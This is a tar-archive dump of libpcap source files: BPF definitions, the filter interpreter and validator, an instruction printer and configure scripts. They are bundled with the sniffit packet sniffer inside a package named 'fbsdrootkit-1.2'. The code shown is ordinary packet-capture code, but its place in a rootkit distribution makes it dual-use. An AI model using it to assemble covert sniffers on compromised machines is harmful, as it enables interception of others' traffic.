*/ struct bpf_version { u_short bv_major; u_short bv_minor; }; /* Current version number of filter architecture. */ #define BPF_MAJOR_VERSION 1 #define BPF_MINOR_VERSION 1 /* * BPF ioctls * * The first set is for compatibility with Sun's pcc style * header files. If your using gcc, we assume that you * have run fixincludes so the latter set should work. */ #if (defined(sun) || defined(ibm032)) && !defined(__GNUC__) #define BIOCGBLEN _IOR(B,102, u_int) #define BIOCSBLEN _IOWR(B,102, u_int) #define BIOCSETF _IOW(B,103, struct bpf_program) #define BIOCFLUSH _IO(B,104) #define BIOCPROMISC _IO(B,105) #define BIOCGDLT _IOR(B,106, u_int) #define BIOCGETIF _IOR(B,107, struct ifreq) #define BIOCSETIF _IOW(B,108, struct ifreq) #define BIOCSRTIMEOUT _IOW(B,109, struct timeval) #define BIOCGRTIMEOUT _IOR(B,110, struct timeval) #define BIOCGSTATS _IOR(B,111, struct bpf_stat) #define BIOCIMMEDIATE _IOW(B,112, u_int) #define BIOCVERSION _IOR(B,113, struct bpf_version) #else #define BIOCGBLEN _IOR('B',102, u_int) #define BIOCSBLEN _IOWR('B',102, u_int) #define BIOCSETF _IOW('B',103, struct bpf_program) #define BIOCFLUSH _IO('B',104) #define BIOCPROMISC _IO('B',105) #define BIOCGDLT _IOR('B',106, u_int) #define BIOCGETIF _IOR('B',107, struct ifreq) #define BIOCSETIF _IOW('B',108, struct ifreq) #define BIOCSRTIMEOUT _IOW('B',109, struct timeval) #define BIOCGRTIMEOUT _IOR('B',110, struct timeval) #define BIOCGSTATS _IOR('B',111, struct bpf_stat) #define BIOCIMMEDIATE _IOW('B',112, u_int) #define BIOCVERSION _IOR('B',113, struct bpf_version) #endif /* * Structure prepended to each packet. 
*/ struct bpf_hdr { struct timeval bh_tstamp; /* time stamp */ bpf_u_int32 bh_caplen; /* length of captured portion */ bpf_u_int32 bh_datalen; /* original length of packet */ u_short bh_hdrlen; /* length of bpf header (this struct plus alignment padding) */ }; /* * Because the structure above is not a multiple of 4 bytes, some compilers * will insist on inserting padding; hence, sizeof(struct bpf_hdr) won't work. * Only the kernel needs to know about it; applications use bh_hdrlen. */ #ifdef KERNEL #define SIZEOF_BPF_HDR 18 #endif /* * Data-link level type codes. */ #define DLT_NULL 0 /* no link-layer encapsulation */ #define DLT_EN10MB 1 /* Ethernet (10Mb) */ #define DLT_EN3MB 2 /* Experimental Ethernet (3Mb) */ #define DLT_AX25 3 /* Amateur Radio AX.25 */ #define DLT_PRONET 4 /* Proteon ProNET Token Ring */ #define DLT_CHAOS 5 /* Chaos */ #define DLT_IEEE802 6 /* IEEE 802 Networks */ #define DLT_ARCNET 7 /* ARCNET */ #define DLT_SLIP 8 /* Serial Line IP */ #define DLT_PPP 9 /* Point-to-point Protocol */ #define DLT_FDDI 10 /* FDDI */ /* * The instruction encondings. 
*/ /* instruction classes */ #define BPF_CLASS(code) ((code) & 0x07) #define BPF_LD 0x00 #define BPF_LDX 0x01 #define BPF_ST 0x02 #define BPF_STX 0x03 #define BPF_ALU 0x04 #define BPF_JMP 0x05 #define BPF_RET 0x06 #define BPF_MISC 0x07 /* ld/ldx fields */ #define BPF_SIZE(code) ((code) & 0x18) #define BPF_W 0x00 #define BPF_H 0x08 #define BPF_B 0x10 #define BPF_MODE(code) ((code) & 0xe0) #define BPF_IMM 0x00 #define BPF_ABS 0x20 #define BPF_IND 0x40 #define BPF_MEM 0x60 #define BPF_LEN 0x80 #define BPF_MSH 0xa0 /* alu/jmp fields */ #define BPF_OP(code) ((code) & 0xf0) #define BPF_ADD 0x00 #define BPF_SUB 0x10 #define BPF_MUL 0x20 #define BPF_DIV 0x30 #define BPF_OR 0x40 #define BPF_AND 0x50 #define BPF_LSH 0x60 #define BPF_RSH 0x70 #define BPF_NEG 0x80 #define BPF_JA 0x00 #define BPF_JEQ 0x10 #define BPF_JGT 0x20 #define BPF_JGE 0x30 #define BPF_JSET 0x40 #define BPF_SRC(code) ((code) & 0x08) #define BPF_K 0x00 #define BPF_X 0x08 /* ret - BPF_K and BPF_X also apply */ #define BPF_RVAL(code) ((code) & 0x18) #define BPF_A 0x10 /* misc */ #define BPF_MISCOP(code) ((code) & 0xf8) #define BPF_TAX 0x00 #define BPF_TXA 0x80 /* * The instruction data structure. */ struct bpf_insn { u_short code; u_char jt; u_char jf; bpf_int32 k; }; /* * Macros for insn array initializers. */ #define BPF_STMT(code, k) { (u_short)(code), 0, 0, k } #define BPF_JUMP(code, k, jt, jf) { (u_short)(code), jt, jf, k } #ifdef KERNEL extern u_int bpf_filter(); extern void bpfattach(); extern void bpf_tap(); extern void bpf_mtap(); #endif /* * Number of scratch memory words (for BPF_LD|BPF_MEM and BPF_ST). */ #define BPF_MEMWORDS 16 #endif fbsdrootkit-1.2/sniffit.0.3.3/libpcap/bpf_filter.c100400 764 764 25354 6226213210 17150 0ustar dfdf/*- * Copyright (c) 1990, 1991, 1992, 1993 * The Regents of the University of California. All rights reserved. 
* * This code is derived from the Stanford/CMU enet packet filter, * (net/enet.c) distributed as part of 4.3BSD, and code contributed * to Berkeley by Steven McCanne and Van Jacobson both of Lawrence * Berkeley Laboratory. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the University of * California, Berkeley and its contributors. * 4. Neither the name of the University nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. 
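* * @(#)bpf.c 7.5 (Berkeley) 7/15/91 * * static char rcsid[] = * "$Header: bpf_filter.c,v 1.22 94/06/05 20:12:39 leres Exp $"; */
#if !(defined(lint) || defined(KERNEL))
static char rcsid[] =
    "@(#) $Header: bpf_filter.c,v 1.22 94/06/05 20:12:39 leres Exp $ (LBL)";
#endif

/*
 * NOTE(review): the header names after each #include were stripped when
 * this page was extracted.  The names below are inferred from the types
 * and macros this file uses (u_int, ntohl, mtod, struct bpf_insn) --
 * confirm them against the upstream file.
 */
#include <sys/param.h>
#include <sys/types.h>
#include <sys/time.h>
#include <net/bpf.h>

/*
 * NOTE(review): outside __alpha these "32-bit" names are long/u_long, so
 * they are wider than 32 bits wherever long is 64 bits.
 */
#if defined(__alpha)
typedef int int32;
typedef u_int u_int32;
#else
typedef long int32;
typedef u_long u_int32;
#endif

#ifdef sun
#include <netinet/in.h>
#endif

#if defined(sparc) || defined(mips) || defined(ibm032) || defined(__alpha)
#define BPF_ALIGN
#endif

/*
 * Big-endian 16/32-bit fetch from packet memory.  With BPF_ALIGN the value
 * is assembled byte by byte so that no unaligned access is made.
 */
#ifndef BPF_ALIGN
#define EXTRACT_SHORT(p)    ((u_short)ntohs(*(u_short *)(p)))
#define EXTRACT_LONG(p)     (ntohl(*(u_int32 *)(p)))
#else
#define EXTRACT_SHORT(p)\
    ((u_short)\
        ((u_short)*((u_char *)(p)+0)<<8|\
         (u_short)*((u_char *)(p)+1)<<0))
#define EXTRACT_LONG(p)\
        ((u_int32)*((u_char *)(p)+0)<<24|\
         (u_int32)*((u_char *)(p)+1)<<16|\
         (u_int32)*((u_char *)(p)+2)<<8|\
         (u_int32)*((u_char *)(p)+3)<<0)
#endif

#ifdef KERNEL
#include <sys/mbuf.h>

/*
 * Advance m to the mbuf that holds byte offset k and reduce k to the offset
 * inside that mbuf.  Returns 0 from the enclosing function when the chain
 * ends first.  The caller must have rejected a negative k already.
 */
#define MINDEX(m, k) \
{ \
    register int len = m->m_len; \
 \
    while (k >= len) { \
        k -= len; \
        m = m->m_next; \
        if (m == 0) \
            return 0; \
        len = m->m_len; \
    } \
}

/*
 * Fetch the big-endian word at byte offset k of the mbuf chain m.  The word
 * may straddle the mbuf holding offset k and the one that follows it.
 * On success *err is 0 and the word is returned.  *err is 1 and 0 is
 * returned when k is negative, when the chain ends before offset k, or when
 * those two mbufs together hold fewer than 4 bytes from offset k.
 */
static int
m_xword(m, k, err)
    register struct mbuf *m;
    register int k, *err;
{
    register int len;
    register u_char *cp, *np;
    register struct mbuf *m0;

    /* A negative offset would index in front of the first mbuf. */
    if (k < 0)
        goto bad;
    len = m->m_len;
    while (k >= len) {
        k -= len;
        m = m->m_next;
        if (m == 0)
            goto bad;
        len = m->m_len;
    }
    cp = mtod(m, u_char *) + k;
    if (len - k >= 4) {
        *err = 0;
        return EXTRACT_LONG(cp);
    }
    m0 = m->m_next;
    if (m0 == 0 || m0->m_len + len - k < 4)
        goto bad;
    *err = 0;
    np = mtod(m0, u_char *);
    /*
     * cp already points at offset k, so it is indexed from 0 here; indexing
     * it with k again would read k bytes further than intended.
     */
    switch (len - k) {

    case 1:
        return ((u_int32)cp[0] << 24) | ((u_int32)np[0] << 16) |
            ((u_int32)np[1] << 8) | np[2];

    case 2:
        return ((u_int32)cp[0] << 24) | ((u_int32)cp[1] << 16) |
            ((u_int32)np[0] << 8) | np[1];

    default:
        return ((u_int32)cp[0] << 24) | ((u_int32)cp[1] << 16) |
            ((u_int32)cp[2] << 8) | np[0];
    }
    bad:
    *err = 1;
    return 0;
}

/*
 * Fetch the big-endian halfword at byte offset k of the mbuf chain m; the
 * two bytes may sit in consecutive mbufs.  On success *err is 0 and the
 * value is returned.  *err is 1 and 0 is returned when k is negative, when
 * the chain ends before offset k, or when the second byte is not available.
 */
static int
m_xhalf(m, k, err)
    register struct mbuf *m;
    register int k, *err;
{
    register int len;
    register u_char *cp;
    register struct mbuf *m0;

    if (k < 0)
        goto bad;
    len = m->m_len;
    while (k >= len) {
        k -= len;
        m = m->m_next;
        if (m == 0)
            goto bad;
        len = m->m_len;
    }
    cp = mtod(m, u_char *) + k;
    if (len - k >= 2) {
        *err = 0;
        return EXTRACT_SHORT(cp);
    }
    m0 = m->m_next;
    /* The low byte comes from the next mbuf, which must hold at least one. */
    if (m0 == 0 || m0->m_len < 1)
        goto bad;
    *err = 0;
    /* cp already includes k; index it from 0. */
    return (cp[0] << 8) | mtod(m0, u_char *)[0];
    bad:
    *err = 1;
    return 0;
}
#endif

/*
 * Execute the filter program starting at pc on the packet p.
 * wirelen is the length of the original packet;
 * buflen is the amount of data present.
 *
 * Returns the value of the RET instruction that ends the run, (u_int)-1
 * when pc is null, and 0 when a load falls outside the packet, a scratch
 * memory index is out of range or a division by zero is attempted.  In a
 * KERNEL build a load that does not fit in buflen is retried through the
 * mbuf helpers, with p cast to struct mbuf *, but only when buflen is 0.
 *
 * Jump targets are not checked here: pc is advanced by whatever the
 * instruction says.  A program from an untrusted source has to be checked
 * (see bpf_validate below, built only for KERNEL) before it is run.
 */
u_int
bpf_filter(pc, p, wirelen, buflen)
    register struct bpf_insn *pc;
    register u_char *p;
    u_int wirelen;
    register u_int buflen;
{
    register u_int32 A, X;
    register int k;
    int32 mem[BPF_MEMWORDS];

    if (pc == 0)
        /*
         * No filter means accept all.
         */
        return (u_int)-1;

    /*
     * Start from a known state so that a program which reads A, X or a
     * scratch word before writing it cannot observe stale stack contents.
     */
    A = 0;
    X = 0;
    for (k = 0; k < BPF_MEMWORDS; ++k)
        mem[k] = 0;

    --pc;
    while (1) {
        ++pc;
        switch (pc->code) {

        default:
#ifdef KERNEL
            return 0;
#else
            abort();
#endif
        case BPF_RET|BPF_K:
            return (u_int)pc->k;

        case BPF_RET|BPF_A:
            return (u_int)A;

        case BPF_LD|BPF_W|BPF_ABS:
            k = pc->k;
            /*
             * The offset is signed; a negative one must not reach the
             * unsigned comparison, and the comparison is written as a
             * subtraction so that it cannot wrap.
             */
            if (k < 0)
                return 0;
            if ((u_int)k > buflen ||
                buflen - (u_int)k < sizeof(int32)) {
#ifdef KERNEL
                int merr;

                if (buflen != 0)
                    return 0;
                A = m_xword((struct mbuf *)p, k, &merr);
                if (merr != 0)
                    return 0;
                continue;
#else
                return 0;
#endif
            }
            A = EXTRACT_LONG(&p[k]);
            continue;

        case BPF_LD|BPF_H|BPF_ABS:
            k = pc->k;
            if (k < 0)
                return 0;
            if ((u_int)k > buflen ||
                buflen - (u_int)k < sizeof(short)) {
#ifdef KERNEL
                int merr;

                if (buflen != 0)
                    return 0;
                A = m_xhalf((struct mbuf *)p, k, &merr);
                /* Same failure handling as the other mbuf loads. */
                if (merr != 0)
                    return 0;
                continue;
#else
                return 0;
#endif
            }
            A = EXTRACT_SHORT(&p[k]);
            continue;

        case BPF_LD|BPF_B|BPF_ABS:
            k = pc->k;
            if (k < 0)
                return 0;
            if ((u_int)k >= buflen) {
#ifdef KERNEL
                register struct mbuf *m;

                if (buflen != 0)
                    return 0;
                m = (struct mbuf *)p;
                MINDEX(m, k);
                A = mtod(m, u_char *)[k];
                continue;
#else
                return 0;
#endif
            }
            A = p[k];
            continue;

        case BPF_LD|BPF_W|BPF_LEN:
            A = wirelen;
            continue;

        case BPF_LDX|BPF_W|BPF_LEN:
            X = wirelen;
            continue;

        case BPF_LD|BPF_W|BPF_IND:
            /* X comes from the program or the packet; treat k as hostile. */
            k = X + pc->k;
            if (k < 0)
                return 0;
            if ((u_int)k > buflen ||
                buflen - (u_int)k < sizeof(int32)) {
#ifdef KERNEL
                int merr;

                if (buflen != 0)
                    return 0;
                A = m_xword((struct mbuf *)p, k, &merr);
                if (merr != 0)
                    return 0;
                continue;
#else
                return 0;
#endif
            }
            A = EXTRACT_LONG(&p[k]);
            continue;

        case BPF_LD|BPF_H|BPF_IND:
            k = X + pc->k;
            if (k < 0)
                return 0;
            if ((u_int)k > buflen ||
                buflen - (u_int)k < sizeof(short)) {
#ifdef KERNEL
                int merr;

                if (buflen != 0)
                    return 0;
                A = m_xhalf((struct mbuf *)p, k, &merr);
                if (merr != 0)
                    return 0;
                continue;
#else
                return 0;
#endif
            }
            A = EXTRACT_SHORT(&p[k]);
            continue;

        case BPF_LD|BPF_B|BPF_IND:
            k = X + pc->k;
            if (k < 0)
                return 0;
            if ((u_int)k >= buflen) {
#ifdef KERNEL
                register struct mbuf *m;

                if (buflen != 0)
                    return 0;
                m = (struct mbuf *)p;
                MINDEX(m, k);
                /* u_char, as in the BPF_ABS case: no sign extension. */
                A = mtod(m, u_char *)[k];
                continue;
#else
                return 0;
#endif
            }
            A = p[k];
            continue;

        case BPF_LDX|BPF_MSH|BPF_B:
            k = pc->k;
            if (k < 0)
                return 0;
            if ((u_int)k >= buflen) {
#ifdef KERNEL
                register struct mbuf *m;

                if (buflen != 0)
                    return 0;
                m = (struct mbuf *)p;
                MINDEX(m, k);
                X = (mtod(m, u_char *)[k] & 0xf) << 2;
                continue;
#else
                return 0;
#endif
            }
            X = (p[k] & 0xf) << 2;
            continue;

        case BPF_LD|BPF_IMM:
            A = pc->k;
            continue;

        case BPF_LDX|BPF_IMM:
            X = pc->k;
            continue;

        /*
         * Scratch memory: the index comes straight from the program, so it
         * is range-checked on every access.
         */
        case BPF_LD|BPF_MEM:
            if (pc->k < 0 || pc->k >= BPF_MEMWORDS)
                return 0;
            A = mem[pc->k];
            continue;

        case BPF_LDX|BPF_MEM:
            if (pc->k < 0 || pc->k >= BPF_MEMWORDS)
                return 0;
            X = mem[pc->k];
            continue;

        case BPF_ST:
            if (pc->k < 0 || pc->k >= BPF_MEMWORDS)
                return 0;
            mem[pc->k] = A;
            continue;

        case BPF_STX:
            if (pc->k < 0 || pc->k >= BPF_MEMWORDS)
                return 0;
            mem[pc->k] = X;
            continue;

        case BPF_JMP|BPF_JA:
            pc += pc->k;
            continue;

        case BPF_JMP|BPF_JGT|BPF_K:
            pc += (A > pc->k) ? pc->jt : pc->jf;
            continue;

        case BPF_JMP|BPF_JGE|BPF_K:
            pc += (A >= pc->k) ? pc->jt : pc->jf;
            continue;

        case BPF_JMP|BPF_JEQ|BPF_K:
            pc += (A == pc->k) ? pc->jt : pc->jf;
            continue;

        case BPF_JMP|BPF_JSET|BPF_K:
            pc += (A & pc->k) ? pc->jt : pc->jf;
            continue;

        case BPF_JMP|BPF_JGT|BPF_X:
            pc += (A > X) ? pc->jt : pc->jf;
            continue;

        case BPF_JMP|BPF_JGE|BPF_X:
            pc += (A >= X) ? pc->jt : pc->jf;
            continue;

        case BPF_JMP|BPF_JEQ|BPF_X:
            pc += (A == X) ? pc->jt : pc->jf;
            continue;

        case BPF_JMP|BPF_JSET|BPF_X:
            pc += (A & X) ? pc->jt : pc->jf;
            continue;

        case BPF_ALU|BPF_ADD|BPF_X:
            A += X;
            continue;

        case BPF_ALU|BPF_SUB|BPF_X:
            A -= X;
            continue;

        case BPF_ALU|BPF_MUL|BPF_X:
            A *= X;
            continue;

        case BPF_ALU|BPF_DIV|BPF_X:
            if (X == 0)
                return 0;
            A /= X;
            continue;

        case BPF_ALU|BPF_AND|BPF_X:
            A &= X;
            continue;

        case BPF_ALU|BPF_OR|BPF_X:
            A |= X;
            continue;

        /* NOTE(review): shift counts are not range-checked. */
        case BPF_ALU|BPF_LSH|BPF_X:
            A <<= X;
            continue;

        case BPF_ALU|BPF_RSH|BPF_X:
            A >>= X;
            continue;

        case BPF_ALU|BPF_ADD|BPF_K:
            A += pc->k;
            continue;

        case BPF_ALU|BPF_SUB|BPF_K:
            A -= pc->k;
            continue;

        case BPF_ALU|BPF_MUL|BPF_K:
            A *= pc->k;
            continue;

        case BPF_ALU|BPF_DIV|BPF_K:
            /* Only the KERNEL validator rejects a constant zero divisor. */
            if (pc->k == 0)
                return 0;
            A /= pc->k;
            continue;

        case BPF_ALU|BPF_AND|BPF_K:
            A &= pc->k;
            continue;

        case BPF_ALU|BPF_OR|BPF_K:
            A |= pc->k;
            continue;

        case BPF_ALU|BPF_LSH|BPF_K:
            A <<= pc->k;
            continue;

        case BPF_ALU|BPF_RSH|BPF_K:
            A >>= pc->k;
            continue;

        case BPF_ALU|BPF_NEG:
            A = -A;
            continue;

        case BPF_MISC|BPF_TAX:
            X = A;
            continue;

        case BPF_MISC|BPF_TXA:
            A = X;
            continue;
        }
    }
}

#ifdef KERNEL
/*
 * Return true if the program f of len instructions is a valid filter
 * program.  The constraints are that the program is not empty, that each
 * jump is forward and lands inside the program, that every scratch-memory
 * load or store (through A or X) uses an index below BPF_MEMWORDS, that no
 * instruction divides by a constant zero, and that the last instruction is
 * a return.
 *
 * The kernel needs to be able to verify an application's filter code.
 * Otherwise, a bogus program could easily crash the system.
 */
int
bpf_validate(f, len)
    struct bpf_insn *f;
    int len;
{
    register int i;
    register struct bpf_insn *p;

    /* An empty program has no last instruction to inspect. */
    if (len < 1)
        return 0;

    for (i = 0; i < len; ++i) {
        /*
         * Check that jumps are forward, and within
         * the code block.
         */
        p = &f[i];
        if (BPF_CLASS(p->code) == BPF_JMP) {
            register int from = i + 1;

            if (BPF_OP(p->code) == BPF_JA) {
                /*
                 * k is signed: a negative value is a backward jump.
                 * Comparing against len - from avoids overflow in
                 * from + k.
                 */
                if (p->k < 0 || p->k >= len - from)
                    return 0;
            }
            else if (p->jt >= len - from || p->jf >= len - from)
                return 0;
        }
        /*
         * Check that memory operations use valid addresses.
         * Stores and loads through X count as well.
         */
        if ((BPF_CLASS(p->code) == BPF_ST ||
             BPF_CLASS(p->code) == BPF_STX ||
             ((BPF_CLASS(p->code) == BPF_LD ||
               BPF_CLASS(p->code) == BPF_LDX) &&
              BPF_MODE(p->code) == BPF_MEM)) &&
            (p->k >= BPF_MEMWORDS || p->k < 0))
            return 0;
        /*
         * Check for constant division by 0.
         */
        if (p->code == (BPF_ALU|BPF_DIV|BPF_K) && p->k == 0)
            return 0;
    }
    return BPF_CLASS(f[len - 1].code) == BPF_RET;
}
#endif
fbsdrootkit-1.2/sniffit.0.3.3/libpcap/bpf_image.c100400 764 764 11346 6226213210 16741 0ustar dfdf/* * Copyright (c) 1990, 1991, 1992, 1994 * The Regents of the University of California. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that: (1) source code distributions * retain the above copyright notice and this paragraph in its entirety, (2) * distributions including binary code include the above copyright notice and * this paragraph in its entirety in the documentation or other materials * provided with the distribution, and (3) all advertising materials mentioning * features or use of this software display the following acknowledgement: * ``This product includes software developed by the University of California, * Lawrence Berkeley Laboratory and its contributors.'' Neither the name of * the University nor the names of its contributors may be used to endorse * or promote products derived from this software without specific prior * written permission. * THIS SOFTWARE IS PROVIDED ``AS IS'' AND WITHOUT ANY EXPRESS OR IMPLIED * WARRANTIES, INCLUDING, WITHOUT LIMITATION, THE IMPLIED WARRANTIES OF * MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE.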
 */
#ifndef lint
static char rcsid[] =
    "@(#) $Header: bpf_image.c,v 1.12 94/01/31 03:22:34 leres Exp $ (LBL)";
#endif

/* NOTE(review): the header names on the #include line below are missing from this copy of the file. */
#include #include #include #include #include #include

/*
 * Render instruction 'p', located at index 'n' of its program, as one line
 * of assembler-like text.
 *
 * The result lives in a static buffer: it is overwritten by the next call
 * and must not be freed.  Both sprintf() calls are unbounded; they stay
 * inside 'operand' and 'image' only because every format used is one of
 * the fixed strings in the table below.
 */
char *
bpf_image(p, n)
	struct bpf_insn *p;
	int n;
{
	/* Opcode -> mnemonic and operand format; anything else is "unimp". */
	static struct {
		int code;
		char *op;
		char *fmt;
	} mnemonics[] = {
		{ BPF_RET|BPF_K,		"ret",	"#%d" },
		{ BPF_RET|BPF_A,		"ret",	"" },
		{ BPF_LD|BPF_W|BPF_ABS,		"ld",	"[%d]" },
		{ BPF_LD|BPF_H|BPF_ABS,		"ldh",	"[%d]" },
		{ BPF_LD|BPF_B|BPF_ABS,		"ldb",	"[%d]" },
		{ BPF_LD|BPF_W|BPF_LEN,		"ld",	"#pktlen" },
		{ BPF_LD|BPF_W|BPF_IND,		"ld",	"[x + %d]" },
		{ BPF_LD|BPF_H|BPF_IND,		"ldh",	"[x + %d]" },
		{ BPF_LD|BPF_B|BPF_IND,		"ldb",	"[x + %d]" },
		{ BPF_LD|BPF_IMM,		"ld",	"#0x%x" },
		{ BPF_LDX|BPF_IMM,		"ldx",	"#0x%x" },
		{ BPF_LDX|BPF_MSH|BPF_B,	"ldxb",	"4*([%d]&0xf)" },
		{ BPF_LD|BPF_MEM,		"ld",	"M[%d]" },
		{ BPF_LDX|BPF_MEM,		"ldx",	"M[%d]" },
		{ BPF_ST,			"st",	"M[%d]" },
		{ BPF_STX,			"stx",	"M[%d]" },
		{ BPF_JMP|BPF_JA,		"ja",	"%d" },
		{ BPF_JMP|BPF_JGT|BPF_K,	"jgt",	"#0x%x" },
		{ BPF_JMP|BPF_JGE|BPF_K,	"jge",	"#0x%x" },
		{ BPF_JMP|BPF_JEQ|BPF_K,	"jeq",	"#0x%x" },
		{ BPF_JMP|BPF_JSET|BPF_K,	"jset",	"#0x%x" },
		{ BPF_JMP|BPF_JGT|BPF_X,	"jgt",	"x" },
		{ BPF_JMP|BPF_JGE|BPF_X,	"jge",	"x" },
		{ BPF_JMP|BPF_JEQ|BPF_X,	"jeq",	"x" },
		{ BPF_JMP|BPF_JSET|BPF_X,	"jset",	"x" },
		{ BPF_ALU|BPF_ADD|BPF_X,	"add",	"x" },
		{ BPF_ALU|BPF_SUB|BPF_X,	"sub",	"x" },
		{ BPF_ALU|BPF_MUL|BPF_X,	"mul",	"x" },
		{ BPF_ALU|BPF_DIV|BPF_X,	"div",	"x" },
		{ BPF_ALU|BPF_AND|BPF_X,	"and",	"x" },
		{ BPF_ALU|BPF_OR|BPF_X,		"or",	"x" },
		{ BPF_ALU|BPF_LSH|BPF_X,	"lsh",	"x" },
		{ BPF_ALU|BPF_RSH|BPF_X,	"rsh",	"x" },
		{ BPF_ALU|BPF_ADD|BPF_K,	"add",	"#%d" },
		{ BPF_ALU|BPF_SUB|BPF_K,	"sub",	"#%d" },
		{ BPF_ALU|BPF_MUL|BPF_K,	"mul",	"#%d" },
		{ BPF_ALU|BPF_DIV|BPF_K,	"div",	"#%d" },
		{ BPF_ALU|BPF_AND|BPF_K,	"and",	"#%d" },
		{ BPF_ALU|BPF_OR|BPF_K,		"or",	"#%d" },
		{ BPF_ALU|BPF_LSH|BPF_K,	"lsh",	"#%d" },
		{ BPF_ALU|BPF_RSH|BPF_K,	"rsh",	"#%d" },
		{ BPF_ALU|BPF_NEG,		"neg",	"" },
		{ BPF_MISC|BPF_TAX,		"tax",	"" },
		{ BPF_MISC|BPF_TXA,		"txa",	"" },
	};
	static char image[256];
	char operand[64];
	char *op, *fmt, *layout;
	int v, i, known;

	/* Start from the "unimp" defaults and refine on a table hit. */
	op = "unimp";
	fmt = "0x%x";
	v = p->k;
	known = 0;
	for (i = 0; i < (int)(sizeof(mnemonics) / sizeof(mnemonics[0])); ++i) {
		if (mnemonics[i].code == p->code) {
			op = mnemonics[i].op;
			fmt = mnemonics[i].fmt;
			known = 1;
			break;
		}
	}

	if (!known)
		v = p->code;		/* show the raw opcode instead of k */
	else if (p->code == (BPF_JMP|BPF_JA))
		v = n + p->k;		/* unconditional jump: print a target */

	/* Conditional jumps additionally print both branch targets. */
	if (BPF_CLASS(p->code) == BPF_JMP && BPF_OP(p->code) != BPF_JA)
		layout = "(%03d) %-8s %-16s jt %d\tjf %d";
	else
		layout = "(%03d) %-8s %s";

	(void)sprintf(operand, fmt, v);
	(void)sprintf(image, layout,
	    n, op, operand, n + 1 + p->jt, n + 1 + p->jf);
	return image;
}
fbsdrootkit-1.2/sniffit.0.3.3/libpcap/checkioctl.c100600 764 764 4677 6226213210 17133 0ustar dfdf/*
 * Copyright (c) 1994, 1995
 * The Regents of the University of California. All rights reserved.
* * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that: (1) source code distributions * retain the above copyright notice and this paragraph in its entirety, (2) * distributions including binary code include the above copyright notice and * this paragraph in its entirety in the documentation or other materials * provided with the distribution, and (3) all advertising materials mentioning * features or use of this software display the following acknowledgement: * ``This product includes software developed by the University of California, * Lawrence Berkeley Laboratory and its contributors.'' Neither the name of * the University nor the names of its contributors may be used to endorse * or promote products derived from this software without specific prior * written permission. * THIS SOFTWARE IS PROVIDED ``AS IS'' AND WITHOUT ANY EXPRESS OR IMPLIED * WARRANTIES, INCLUDING, WITHOUT LIMITATION, THE IMPLIED WARRANTIES OF * MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. */ /* @(#) $Header: checkioctl.c,v 1.3+ 95/04/08 03:14:53 leres Exp $ (LBL) */ /* * checkioctl - check to see if fixincludes has been run * * The problem we're trying to detect is that we're using gcc but * fixincludes hasn't been run. Pre-ansi ioctl macros usually * look something like: * * #define _IO(x, y) (IOC_VOID | ('x' << 8) | y) * * while ansi ioctl macros look like: * * #define _IO(x, y) (IOC_VOID | (x << 8) | y) * * The difference being that in ansi, you can't quote macro arguments. * Notice that if you use the pre-ansi macro with ansi code, the first * argument is never expanded; it always comes out as 'x' or whatever. * This program detects this. 
*/ #include #include #ifndef SOLARIS #include #else #include #endif #include #include #include #include "pcap-int.h" #ifdef __GNUC__ int main(int, char **); #endif int main(argc, argv) int argc; char **argv; { register char *prog; if ((prog = strrchr(argv[0], '/')) != NULL) ++prog; else prog = argv[0]; #ifdef __GNUC__ if (_IO('A', 1) == _IO('B', 1)) { fprintf(stderr, "%s: You are using gcc and need to run fixincludes!\n", prog); exit(1); } #else printf("%s: You are not using gcc\n", prog); #endif exit(0); } fbsdrootkit-1.2/sniffit.0.3.3/libpcap/configure100700 764 764 6232 6226213210 16551 0ustar dfdf#!/bin/csh -f set bison set ethers set flex set gcc set gcc1 set pcap set ranlib set brokenmake if ( -e /dev/bpf0 ) then set pcap=bpf else if ( -f /usr/include/net/pfilt.h ) then set pcap=pf else if ( -e /dev/enet ) then set pcap=enet else if ( -e /dev/nit ) then set pcap=snit else if ( -f /usr/include/sys/net/nit.h ) then set pcap=nit else if ( -f /usr/include/net/raw.h ) then set pcap=snoop # must test for snoop before dlpi due to IRIX else if ( -f /usr/include/sys/dlpi.h ) then set pcap=dlpi else if ( -f /usr/include/linux/types.h ) then set pcap=linux else echo "configure: cannot determine packet capture interface" exit 1 endif echo "configure: using $pcap packet capture interface" if ( -x /bin/uname || -x /usr/bin/uname ) then set name=`uname -s | tr '[A-Z]' '[a-z]'` set vers=`uname -r | sed -e 's/\..*//' -e 's/T1/v1/' | tr '[A-Z]' '[a-z]'` if ( "$name$vers" == "sunos5") then set path=($path /usr/ccs/bin) endif else if ( -x /bin/arch ) then # sun3 only supported machine without uname if ( `/bin/arch` == sun3 ) then set name=sunos set vers=3 endif endif if ( $name == "bsd/386" || $name == "bsd/os" ) then set os=bsd else set os=$name$vers endif if ( -x /usr/local/bin/flex || -x /usr/local/flex ) then # The -V flag was added in 2.4 flex -V >& /dev/null if ($status == 0) then set flex='-e s/^#have-flex#//' echo "configure: found 